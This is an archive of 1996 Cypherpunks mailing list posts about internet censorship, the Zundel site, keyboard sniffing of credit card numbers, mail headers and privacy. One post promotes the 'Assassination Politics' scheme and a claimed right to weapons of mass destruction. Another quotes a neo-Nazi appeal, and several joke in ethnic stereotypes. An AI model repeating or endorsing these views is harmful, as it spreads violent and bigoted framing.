From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sat, 3 Feb 1996 11:09:05 +0800
To: mpd@netcom.com
Subject: Re: Futplex makes the news!
Message-ID: <199602030230.SAA20498@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On 2 Feb 1996 19:02:29 -0500, you wrote:

>I think the whole endeavor was a resounding success, and I wish I had been
>on the ball enough to participate in it. 

[deletia]

>The important thing is that Rich, Declan, Futplex, and anyone else
>participating showed the world that censorship on the internet, if not
>impossible, is at least a good deal more dificult then people thought.

Before poo-pooing Tim, declaring victory, and returning home, it
should be noted that German prosecutors today added AOL to the list of
entities they wish to charge with "inciting hatred."

UMASS will of course test the political waters before taking any
action, but we may yet see the gonads of Futplex hanging from one of
the upper floors of the Graduate Research Center.  :)

Time will tell whether we have won this war, or have simply
encountered a lull after the first onslought by the enemy.  

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Sat, 3 Feb 1996 16:59:35 +0800
To: cypherpunks@toad.com
Subject: Re: Imminent Death of Usenet Predicted
Message-ID: <v02120d01ad387c424334@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 1:18 AM 2/3/96, Dave Mandl wrote:

>As I and others have been saying for a while: what's happening on the net
>is another "enclosures" movement.  Yes, I know that on this list that's a
>politically incorrect view.  Deal with it.

        "Politically incorrect" on this list? What's gotten into you, Dave?
Really! PCism is what all those goddamn Tax-n-Spend Leftist Liberals
do--you know, like the ones in the _Life of Brian_. Folks here would never
engage in _any_ kind of PCism. I'm shocked, shocked...
        Don't you get it? Nation-states are going to collapse Real Soon Now
(after all, their Imminent Death has been Predicted), and the Markets,
guided by an irresistably beckoning Invisible Hand, will Rise Up against
their Tyrannous Masters and be guided out of State Space into
Crypto-Anarchy[T{C}M], the land of milk and honey. And everyone who's
positioned themselves shrewdly--as your friend no doubt has--will prosper.
No problem!
        Tell your friend she has _nothing_ to worry about. In a few months,
she'll look back and laugh.


--Victor! von Kredulous-am-Kapitalismus

Visit Pere Lachaise!
We got majordomos, we're typing on phone lines, it's Realpolitik Lite & Fun 2!
---------:---------:---------:---------:---------:---------:---------:----
Nostradamus F. Xavier          | Clipto-nemesis: privatization, tons of $$$,
victor@get.not   212-255-2748  | end of history, optimistic tax deductions,
G.A.D.D.I.S.: Nag Hammadi, EG  | C-corps, lecture circuits, insider trading,
Higher power: "What me worry?" | carpal tunnel syndrome, other cool stuff.
"Sleeping policemen are national borders on the Information Soapbox Derby."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 3 Feb 1996 11:45:38 +0800
To: cypherpunks@toad.com
Subject: What is this threat?
Message-ID: <199602030254.DAA04307@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



The USG offers a $500,000 reward for stopping:

   Perception management and active measures activities.

The FBI DECA terms it one of seven "foreign intelligence 
activities that are deemed to be significant threats to  
U.S. national security interests."

----------

URL: http://www.fbi.gov/deca.htm
    
_______________________________________________________
   
DECA (pronounced "DECK-UH") is the FBI's program for the
Development of Espionage, Counterintelligence and
Counterterrorism Awareness. The DECA program disseminates
information concerning national security matters.
   
The FBI is the lead counterintelligence agency in the
United States. It has the principal authority to conduct
and coordinate counterintelligence and counterterrorism
investigations and operations within the United States.
The FBI, supported by other U.S. agencies as needed,
conducts espionage investigations when the subject of the 
investigation is not under the jurisdiction of the
Department of Defense, Uniform Code of Military Justice.
_______________________________________________________
   
NATIONAL SECURITY THREAT LIST
   
The FBI's foreign counterintelligence mission is set out
in a strategy known as the National Security Threat List
(NSTL). The NSTL combines two elements:

*  First, it includes national security threat issues
   regardless of the country of origin.

*  Second, it includes a classified list of foreign
   powers that pose a strategic intelligence threat to
   U.S. security interests.

The issue threat portion of the NSTL was developed in
concert with the U.S. Intelligence Community and key
elements of the U.S. Government. As a result, the FBI
identified seven categories of foreign intelligence
activity that were deemed to be significant threats to 
U.S. national security interests. The FBI will
investigate the intelligence activities of any country
that are related to any of these seven issues. They are:

1. Proliferation of special weapons of mass destruction
   to include chemical, biological, nuclear, and delivery
   systems of those weapons of mass destruction.

2. Collection of information relating to defense
   establishments and related activities of national
   preparedness.

3. U.S. critical technologies as identified by the
   National Critical Technologies Panel.

4. Targeting of U.S. intelligence and foreign affairs
   information and U.S. Government officials.

5. Collection of U.S. industrial proprietary economic
   information and technology, the loss of which would
   undermine the U.S. strategic industrial position.

6. Clandestine foreign intelligence activity in the
   United States.

7. Perception management and active measures activities.

_______________________________________________________
    
NATIONAL CRITICAL TECHNOLOGIES
   
Foreign intelligence activities directed at U.S. critical
technologies are of specific interest to the FBI. These
critical technologies are listed as follows:

   *  Materials:

      +  Materials synthesis and processing
      +  Electronic and photonic materials
      +  Ceramics
      +  Composites
      +  High-performance metals and alloys

   *  Manufacturing:

      +  Flexible computer-integrated manufacturing
      +  Intelligence processing equipment
      +  Micro- and nanofabrication
      +  Systems management technologies

   *  Information and communications:

      +  Software
      +  Micro and optoelectronics
      +  High-performance computing and networking
      +  High-definition imaging and displays
      +  Sensors and signal processing
      +  Data storage and peripherals
      +  Computer simulation and modeling

   *  Biotechnology and life sciences:

      +  Applied molecular biology
      +  Medical technology

   *  Aeronautics and surface transportation:

      +  Aeronautics
      +  Surface transportation technologies

   *  Energy and environment:

      +  Energy technologies
      +  Pollution minimization, remediation, and waste
         management

_______________________________________________________
   
National Security Begins With You
  
You may be the target of foreign intelligence activity if
you or your company are associated in any of the critical
technologies listed above. Foreign powers may also seek
to collect U.S. industrial proprietary economic
information and technology, the loss of which would
undermine the U.S. strategic industrial position. Foreign
intelligence collectors target corporate marketing
information in support of their nation's firms. Overseas
travel, foreign contact, and joint ventures may further
increase your exposure to the efforts of foreign
intelligence collectors. If you suspect possible foreign
intelligence activity, or have questions concerning the
National Security Threat List strategy, please contact
the FBI DECA Coordinator at the FBI Field Office nearest
you.

_______________________________________________________

Up to $500,000 Reward for Stopping Espionage
  
An amendment to title 18 U.S.C. Section 3071, recently
enacted, authorizes the Attorney General to make payment
for information of espionage activity in any country
which leads to the arrest and conviction of any
person(s):

1. ...for commission of an act of espionage against the
   United States;

2. ...for conspiring or attempting to commit an act of
   espionage against the United States;

3. or which leads to the prevention or frustration of an
   act of espionage against the United States.

Specifics of this amendment can be obtained from any FBI
DECA Coordinator.

_______________________________________________________

FBI Contact Numbers:
   
To report suspected illegal intelligence or terrorism
activity against the interest of the United States,
telephone the DECA Coordinator at the FBI Field Office
nearest you.

Update Version: 9/25/95

_______________________________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan McGuirk <mcguirk@indirect.com>
Date: Sat, 3 Feb 1996 22:24:47 +0800
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: Crypto suggestion - re: Fatal Flaws in Credit Cards
In-Reply-To: <199602030951.BAA12301@ix2.ix.netcom.com>
Message-ID: <199602031408.HAA04273@bud.indirect.com>
MIME-Version: 1.0
Content-Type: text


> Nathaniel's written about the "fatal flaw" in any system that
> involves typing credit card numbers into your computer being that
> they're easy for a keyboard-sniffer or similar cracker to recognize.
> An obvious work-around for this (and for many of the problems with
> Social Security / Taxpayer ID numbers) is to use some sort of smartcard
> that generates one-shot numbers that the credit card company (or tax thugs)
> can map back to the "real" owner's ID.
> 
>[...]
>
> Any other suggestions?

Isn't this what zero-knowledge proofs are for?  Prove you know the
credit card number without ever having to transmit it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Sat, 3 Feb 1996 21:47:31 +0800
To: cypherpunks@toad.com
Subject: Toronto ZS radio coverage
Message-ID: <96Feb3.081746edt.3003@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


The first item on the 8:00 AM radio news this morning was about the
Zundelsites, cypherpunks, and German censorship.  The station was
CFNY 102.1, an alternative music station that is quite net.aware.
We probably got the coverage here because Toronto is Zundel's home
town.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 3 Feb 1996 21:48:05 +0800
To: "Declan B. McCullagh" <cypherpunks@toad.com
Subject: Re: Germany investigates AOL for providing Zundelaccess
Message-ID: <2.2.32.19960203132452.009ce224@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:34 PM 2/2/96 -0500, Declan B. McCullagh wrote:

>      America Online spokesman Ingo Reese in Hamburg said his company
>also was happy to work with the prosecutors. The company is ``totally
>opposed'' to illegal propaganda, he said, but argued that commercial
>on-line companies have as much control over materials posted on the
>Internet as telephone companies have over their customers'
>conversations.

That's what happens when you hire Germans for your German operations.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson, P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Sun, 4 Feb 1996 04:07:02 +0800
To: tcmay@got.net
Subject: RE: Sometimes ya just gotta nuke em
Message-ID: <960203083305.2020cd29@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim rote:
>At 4:12 AM 2/3/96, Rich Graves wrote:
>>Who holds up the nuking of Hiroshima and Nagasaki as great victories
>>against tyranny?
>Since you ask, I do.

And the biggest secret of the war was that "Fat Man" was the *last* A-bomb
we had or could build for about a year (had taken several *years* to
separate enough fissionable material for the three via two entirely
different processes).

To me this is the great strength of the USA: given a theoretical problem, we
will develop a hundred different solutions, try them all in parallel, and at 
least one will work.
						Warmly,
							Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 4 Feb 1996 01:09:43 +0800
To: Rich Graves <tcmay@got.net>
Subject: Re: THIS IS NOT NUKEPUNKS Re: Sometimes ya just gotta nuke em
Message-ID: <m0til49-00090PC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 09:25 PM 2/2/96 -0800, Rich Graves wrote:
>ROTFL
>
>But this is not nukepunks...
>
>and that wasn't my point. There is considerable debate about whether
>dropping the bomb was right. The moral clarity of a Gandhi, MLK, or (to
>add someone who actually killed people, I think) Thomas Paine is much more
>useful when you're talking about winning hearts & minds. 

>If you have a choice, don't nuke.
>But yes, sometimes ya just gotta nuke em.
>-rich

Actually, at this point I don't think it would be inappropriate to remind
you two debaters (as well as the rest of the people here) that part of the
implications of my "Assassination Politics" idea is that it would
automatically force the elimination of all heavy weapons including nuclear,
down perhaps to handheld rifles.

 I am a 2nd amendment absolutist:  I believe that I have the right to
possess any and all "arms," including nuclear, biological, and chemical, as
well as all convention armaments.

There is no contradiction here.  

BTW, Rich, I hope you saw my recent comment wherein I praised you for your
principles and courage concerning the "Zundelsite" situation.  Perhaps I
originally judged you in haste.  While possessing no sympathy (even strongly
negative sympathy) for Nazi and Neo-Nazi (and Holocaust revisionist)
propaganda, I have similarly low opinions of censorship of all kinds.

My knowledge of this is hazy, however.  Consider this the beginnings of what
may be a profound and sincerely felt apology.

Jim Bell 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMROQgvqHVDBboB2dAQHOYwQAoSItmeqPx0m6YWLIfCL3B3UX9KbvWynJ
y0xxsuP3Q/ra8JDHAonDYnvrI2avmWGXErtHRnVfKW0ohgBAOizfcbZay3/WDW30
ZYRq/OERyzLjq4u98ecrykoxU2whkomzLycdx2/1fl6rmQxvFFW0xwjZtX2q5K2b
Aj0XwefNtuc=
=iqsH
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 3 Feb 1996 22:05:06 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: [NOISE] Futplex makes the news!
Message-ID: <2.2.32.19960203134458.009cfccc@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:24 PM 2/2/96 -0500, lmccarth@cs.umass.edu wrote:

>Just to be clear, I haven't been expelled or suspended from the school, and
>I have not been notified of any kind of pending disciplinary action against
>me. The pages are indeed gone, however.
>
>Lewis "Futplex" McCarthy, checking in from Rumor Control Central
>

So that's why my How to Read Banned Newsgroups on Compuserve is unavailable.
I'll get it back up on IOS later today.  Would someone else like to mirror
it for redundancy?  It's only one page.

Sameer -- if you're listening, maybe you and I could start an updated site
"Censorship Central" that maintains updated links to banned materials so
people can do "one stop shopping."

DCF 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 3 Feb 1996 22:13:59 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: [NOISE] Futplex makes the news!
Message-ID: <2.2.32.19960203135737.00740450@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:24 PM 2/2/96 -0500, lmccarth@cs.umass.edu wrote:
>Just to be clear, I haven't been expelled or suspended from the school, and
>I have not been notified of any kind of pending disciplinary action against
>me. The pages are indeed gone, however.
>
>Lewis "Futplex" McCarthy, checking in from Rumor Control Central

Are *you* going to bring action against the school?  You could proceed
administratively for free.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Sat, 3 Feb 1996 22:26:59 +0800
To: pmarc@fnbc.com
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit
In-Reply-To: <9601292111.AA23738@toad.com>
Message-ID: <sl4qfMqMc50e15giRj@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail.cypherpunks: 2-Feb-96 Re: FV Demonstrates Fatal F..
"Paul M. Cardon"@fnbc.co (1751*)

> > I can guarantee you that it wasn't our system that did this. If
> > there's one things we know cold, it's email.

> C'mon Nathan.  It was in the Received headers generated at your  
> end.  I agree that it COULD have happened on our end, but it didn't.  
>  I've never seen anybody with such an arrogant attitude.  BTW, it  
> looks like it has been fixed now.  :-b

Well, I would think that if you were seriously trying to diagnose this
problem, you would have heeded my request and actually sent me the
Received headers that you claim prove that there was a problem on my
end.  I've been tracking down mail delivery problems for fifteen years
now, I take them *excruciatingly* seriously, and I think I know a
*little* bit about them.  If that makes me arrogant, I apologize.

Received headers are typically (but not always) added at each step along
the way as a mail message travels in a store-and-forward manner.  Mail
that leaves my system typically(i.e. using my preferred user agent) has
two Received headers by the time it leaves, and neither of them specify
the destination address at all.  Received headers don't generally
include destination informations, but may include them optionally, using
a FOR clause.  Any Received header that actually included the bogus
address you specified is definitely not generated by my machine, not
merely because I'm confident it wouldn't use that address, but more
critically because that clause of Received headers (FOR) isn't EVER
generated by my machine!  That's how I can be so absolutely sure that it
wasn't added by my machine.  When messages leave my machine they have
two Received headers, using these formats:

Received: by  nsb.fv.com (4.1/SMI-4.1)
        id AA26452; Fri, 2 Feb 96 16:40:24 EST
Received: from Messages.8.5.N.CUILIB.3.45.SNAP.NOT.LINKED.nsb.fv.com.sun4.41
          via MS.5.6.nsb.fv.com.sun4_41;
          Fri,  2 Feb 1996 16:40:23 -0500 (EST)

Note the complete absence of any FOR clause here.  It doesn't matter WHO
my system is sending mail to, it doesn't document the fact in the
Received headers.  (NOTE TO C'PUNKS:  In general, any mail relay that
uses the FOR clause for anything other than "final" delivery -- a very
tricky concept, by the way -- is indulging in a potentially very serious
breach of privacy, which should certainly concern the readers of this
list.  That's because it is typically based on the envelope addresses
rather than the header addresses, and hence can expose recipient names
that the sender thinks were being kept confidential, such as BCC
addresses.  That's one reason I prefer not to use the FOR clause at all.)

Note also that Received headers almost always appear in reverse order of
composition, because most relaying software just prepends them.  This
means that the mail you got from me probably has two headers like this
one, and that the one before it is the first one added by any machine
other than mine.  Most likely, the one before this is added at FV's mail
relay.  I don't *think* it uses "FOR" clauses either, but I can't swear
to that.

I hope this is helpful.  This is as far as I can go in diagnosing this
problem without actually seeing the mail headers you claim to have
received.  If you have any interest in diagnosing the real problem, as
opposed to publicly flaming me, I encourage you to send me the headers. 
I also see no point whatsoever in continuing to CC cypherpunks on the
diagnosis of a mail delivery problem, but will continue to do so in my
replies if you continue to send mail to cypherpunks slandering my
technical abilities in the guise of talking about a mail delivery
problem for which you refuse to provide documentary evidence that is
allegedly in your posession.  -- Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Crocker <dcrocker@brandenburg.com>
Date: Sun, 4 Feb 1996 01:56:42 +0800
To: Nathaniel Borenstein <nsb@nsb.fv.com>
Subject: Don't type your yes/fraud response into your computer
Message-ID: <v03004a07ad394d54df7f@[205.214.160.52]>
MIME-Version: 1.0
Content-Type: text/plain


(I sent this separately to the www-buyinfo list and now decided that
cypherpunks might also be an interesting -- or even better -- venue for
raising the question.  Sorry for the duplicates if you get them.  d/)

If this has shown up in one or another of the discussion threads already, I
apologize for missing it.

	In thinking about the nature of the credit card keyboard attack, it
occurs to me that the confirmation message sent from First Virtual back to
the (purported) purchases is, itself, pretty distinctive.  It makes me
wonder whether an attack of the style used to detect credit card typing on
the keyboard could not also be used to detect the arrival of the FV
confirmation query and then, of course, to automatically generate a 'yes'
response back to FV?

	At base, the moral to the story is that a compromised user machine
permits essentially any and all activities to be suborned.  Only a smart
card mechanism stands a chance of standing up to this, but that, in effect,
makes the smart card the 'user machine'.

d/

--------------------
Dave Crocker                                                +1 408 246 8253
Brandenburg Consulting                                 fax: +1 408 249 6205
675 Spruce Dr.                                     dcrocker@brandenburg.com
Sunnyvale CA 94086 USA                           http://www.brandenburg.com

Internet Mail Consortium                   http://www.imc.org, info@imc.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Sun, 4 Feb 1996 02:16:39 +0800
To: Cypherpunks Mailing List <frissell@panix.com>
Subject: RE: [NOISE] Futplex makes the news!
Message-ID: <01BAF21F.279FC500@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	Duncan Frissell

Sameer -- if you're listening, maybe you and I could start an updated site
"Censorship Central" that maintains updated links to banned materials so
people can do "one stop shopping."
....................................................................

Look at:  
http://www.mit.edu:8001/activities/safe/home.html

in particular, at:  
http://www.mit.edu:8001/activities/safe/notsee.html#Politics


   ..
Blanc









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 4 Feb 1996 01:54:28 +0800
To: cypherpunks@toad.com
Subject: Re: Germany investigates AOL for providing Zundelaccess
Message-ID: <ad38ddfd00021004a2b1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:24 PM 2/3/96, Duncan Frissell wrote:
>At 07:34 PM 2/2/96 -0500, Declan B. McCullagh wrote:
>
>>      America Online spokesman Ingo Reese in Hamburg said his company
>>also was happy to work with the prosecutors. The company is ``totally
>>opposed'' to illegal propaganda, he said, but argued that commercial
>>on-line companies have as much control over materials posted on the
>>Internet as telephone companies have over their customers'
>>conversations.
>
>That's what happens when you hire Germans for your German operations.


He was only following orders.


--Tim


Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Banes (Wasser) <a-johnb@microsoft.com>
Date: Sun, 4 Feb 1996 03:33:34 +0800
To: cypherpunks@toad.com
Subject: Re: Microsoft's CryptoAPI - thoughts?
Message-ID: <red-17-msg960203191438MTP[01.52.00]000000a4-49780>
MIME-Version: 1.0
Content-Type: text/plain


I have "standardized" the PS files on the MS website, so there should 
be no more problems. Sorry for the inconvenience.
----------
| From: Futplex  <futplex@pseudonym.com>
| To: Cypherpunks Mailing List  <cypherpunks@toad.com>
| Cc: CryptoAPI Information Alias
| Subject: Re: Microsoft's CryptoAPI - thoughts?
| Date: Friday, January 26, 1996 3:02AM
|
| rickt@psa.pencom.com writes:
| > [Info can be found at: 
http://www.microsoft.com/intdev/inttech/cryptapi.htm]
|
| Has someone here managed to extract PostScript hardcopy of the
| CAPI from this Web page? I tried earlier this evening and
| wound up with a miniature
| ecological disaster on my hands. The page says:
|
| "For ease of online reading and printing, we've provided copies of this
| lengthy document in Microsoft Word and Postscript formats."
|
| I grabbed the ZIPped PostScript version and unZIPped it, which resulted in a
| single file called "capiapp.ps". Making the wild assumption that this was
| indeed a PostScript file, I sent it to the printer and forgot about it for a
| while.
|
| An hour later I discovered a chaotic scene in the printer room, as the
| printer had spewed about 1.5 reams of raw PostScript printouts. The 
output bin
| had overflowed for a while, spraying paper in several directions. 
<heavy sigh>
|
| As it turns out, the file unhelpfully begins with
| 	%-12345X@JPL ENTER LANGUAGE=POSTSCRIPT
| preceding the usual "%!PS-Adobe-3.0" line. Worse still, it appears that the
| capiapp.ps file is actually a catenation of many PostScript files (one per
| chapter?), each beginning with a version of this ensnarling line.
|
| I could do some global search-and-replacing, etc., but I think I'll wait for
| Microsoft to distribute a decent PS version of this document. Perhaps they
| should consider not generating it with MS Word....
|
| Grr!
|
| Futplex <futplex@pseudonym.com>
| 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gordon Campbell <campbelg@limestone.kosone.com>
Date: Sun, 4 Feb 1996 00:40:57 +0800
To: cypherpunks@toad.com
Subject: What happened to Aegis?
Message-ID: <2.2.32.19960203162249.0068582c@limestone.kosone.com>
MIME-Version: 1.0
Content-Type: text/plain


After doing a total reinstall of my system (don't ask) I discovered that I
don't have a copy of the Aegis PGP Shell distribution archive anywhere. I
attempted to grab it from http://iquest.com/~aegisrc as listed in the docs,
but the site doesn't exist.

Doesn anybody know what gives and where I can get a new copy of the archive?
I really like this shell and haven't figured out how to otherwise integrate
PGP with EudoraPro.

Any other suggestions are also welcome.

-----
Gordon R. Campbell, Owner - Mowat Woods Graphics
P.O. Box 1902, Kingston, Ontario, Canada  K7L 5J7
Ph: (613) 542-4087   Fax: (613) 542-1139
2048-bit PGP key available on request.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Sat, 3 Feb 1996 09:55:08 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU (E. ALLEN SMITH)
Subject: Re: Just what the Internet needs right now...
In-Reply-To: <01I0QVJK2WDSA0UTJS@mbcl.rutgers.edu>
Message-ID: <199602030025.LAA25077@suburbia.net>
MIME-Version: 1.0
Content-Type: text


>    He said police found diesel fuel, a bag of fertilizer and other items
>    -- the basic materials to build a bomb-- at the first boy's house.

Looks like I've just been placed into the ranks of the pyro-terrorist.

Golly, Deisel fuel.
Gosh, Fertilizer.
Ma, other items.

-- 
+----------------------------------+-----------------------------------------+
|Julian Assange                    | "if you think the United  States has    |
|FAX: +61-3-9819-9066              |  stood still, who built the largest     |
|EMAIL: proff@suburbia.net         |  shopping centre in the world?" - Nixon |
+----------------------------------+-----------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com
Date: Sun, 4 Feb 1996 02:55:57 +0800
To: cypherpunks@toad.com
Subject: Our "New Order"
Message-ID: <199602031830.LAA12987@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


(Apologies to those on the cyberia-l list, to which this was x-posted, and
to Perry Metzger.)

In view of the fact that our government seems bent on abrogating its
citizens' rights to free speech, has anyone done a survey indicating which
foreign countries have the best Net connections to the U.S. (excepting, of
course, Germany and possibly France)?

It may be expedient for Planned Parenthood and others whose points of view
differ somewhat from those approved under our "New Order"* to explore
alternatives in order to reach their constituencies.

--David M. Rose

* "My New Order", as many of you know, is the 1941 sequel to "Mein Kampf".





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sun, 4 Feb 1996 05:58:25 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: PGP "official" logo?
Message-ID: <199602031635.LAA16677@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


EFF is promoting a new symbol of free speech -- the blue ribbon.

Can/should a PGP logo incorporate that somehow?

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 4 Feb 1996 18:03:42 +0800
To: cypherpunks@toad.com
Subject: Re: THE JEWS (ALL of them!) Try to kick Ernst Zundel off Usenet!!
Message-ID: <2.2.32.19960203194631.00955980@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:46 PM 2/3/96 -0500, ErnstZundl@aol.com wrote:

>If you are a *true* Patriot, and a *true* Aryan, then you *MUST*
>make the journey to Antarctica and into the volcano!!  We owe it to
>the world, we owe it to the great Adolph Hitler, and we owe it to
>the White Race.

"But what about Hitler's Brain?"

|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Sun, 4 Feb 1996 03:29:12 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: THE JEWS (ALL of them!) Try to kick Ernst Zundel off Usenet!!
In-Reply-To: <960203124656_311380557@emout09.mail.aol.com>
Message-ID: <Pine.LNX.3.91.960203120313.20447A-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


oh my...

i guess it really does take all types.

-pjf

"Those that give up essential liberty to obtain a little temporary
 safety deserve neither liberty nor safety." -- Benjamin Franklin (1773)
			  finger for PGP key
zifi runs LINUX 1.3.59 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jordan Hayes <jordan@Thinkbank.COM>
Date: Sun, 4 Feb 1996 04:47:09 +0800
To: cypherpunks@toad.com
Subject: Re: Imminent Death of Usenet Predicted
Message-ID: <199602032012.MAA01412@Thinkbank.COM>
MIME-Version: 1.0
Content-Type: text/plain


	From jf_avon@citenet.net Sat Feb  3 11:04:01 1996

	>Soon I hope
	>that there will be as much chance of children 'stumbling upon'
	>X-rated JPEGs as they can today image satellite-delivered porno in
	>their heads without a dish.

	I guess that children do not see the depicted event as as
	traumatic as you personnally do...  But guess what, maybe
	some peoples do not mind their kids seeing theses pictures.

<NOT-CRYPTO>

Hey, I tried to explain this, but you missed it: I *don't personally
care* about whether kids see porno.  I *know* that a *huge* percentage
of the population in this country does (sorry for being USA-centric,
but we have [at least for now] the largest net population, so you
can see how this will go ...).  Therefore, I'd like to see a way
for the default be that kids (dare I say everyone!) don't *automatically
stumble upon* it in the open network.  I'm all for parents giving
access to their kids to whatver they feel is right, and I'm all
for adults making that choice as well; but I think that if the
majority of the people in a community don't want the default behavior
to be "click here for tits!" then it's up to us, as technologists,
to provide easy-to-use mechanisms for those who do want to see them
to not infringe on those who don't.

If you want porno on your TV, you can rent it, you can pay-per-view
it, you can get a sattelite dish, or whatever.  But most people
don't want it by default to be on channel 7.  Last time: I *personally*
am not one of them, but it's important to see what the majority
thinks on this issue.

</NOT-CRYPTO>

	Phones are *NOT* private devices.

Again, you missed my point.  People *think* they are, and if you
compare "private" calls to "tapped" calls, you'll see that the
expectation of privacy is not so misplaced.  Yes, if your communications
are important to you or you are a potential target of investigation,
you should know it's not private.  But it's not like any significant
number of phone calls are tapped, by the government or otherwise.
And it's not likely to happen, either, because NONE CARES WHAT YOU
SAY TO YOUR FRIEND ON THE PHONE.

	You can tap a phone for 10$ worth of Radio Shack hardware.

And I'm sure you do this, what, 18,000 times per hour?  I'm like
so sure that you listen to all your neighbors phone calls.

	>And don't forget: if you have privacy, you don't need anonymity.
	>Swiss banks provide the ultimate example.

	I would like other peoples to comment on this one, but I
	think that swiss banks *did* also provide anonymity. (number
	accounts)

You can get a numbered account at a Swiss bank by showing up at
the branch, introducing yourself to the branch manager, proving to
him who you are, and signing some papers.  They will keep your name
out of any transactions you make, but they *know you* ... this is
not anonymity; this is merely privacy.

Another good example is John Perry's PGP'd mailing list.  No chance
of anyone "stumbling upon" the content, since it's all PGP'd.  But
it's not anonymous, and for good reasons.  So what if all mailing
lists were like this?  What if alt.binaries.pictures.erotica.oral
was like this? What if all our mail programs and news readers were
able to cope easily with this?  I think this is the question that
efforts like IPSec are trying to answer: we'd all be *way* better
off.

What if looking at a JPEG were like buying beer?  The default is
that a 12 year old isn't going to fool the guy at 7-11, but if
their parents buy a beer and give it to 'em, what the heck?
Consuming alcohol is not regulated; *purchasing* it is.

Don't forget: the fact that "porno on the net" (for instance) is
an issue *at all* is a *failure* of technology.  It would be a
non-issue if USENET wasn't essentially a technology vacuum.

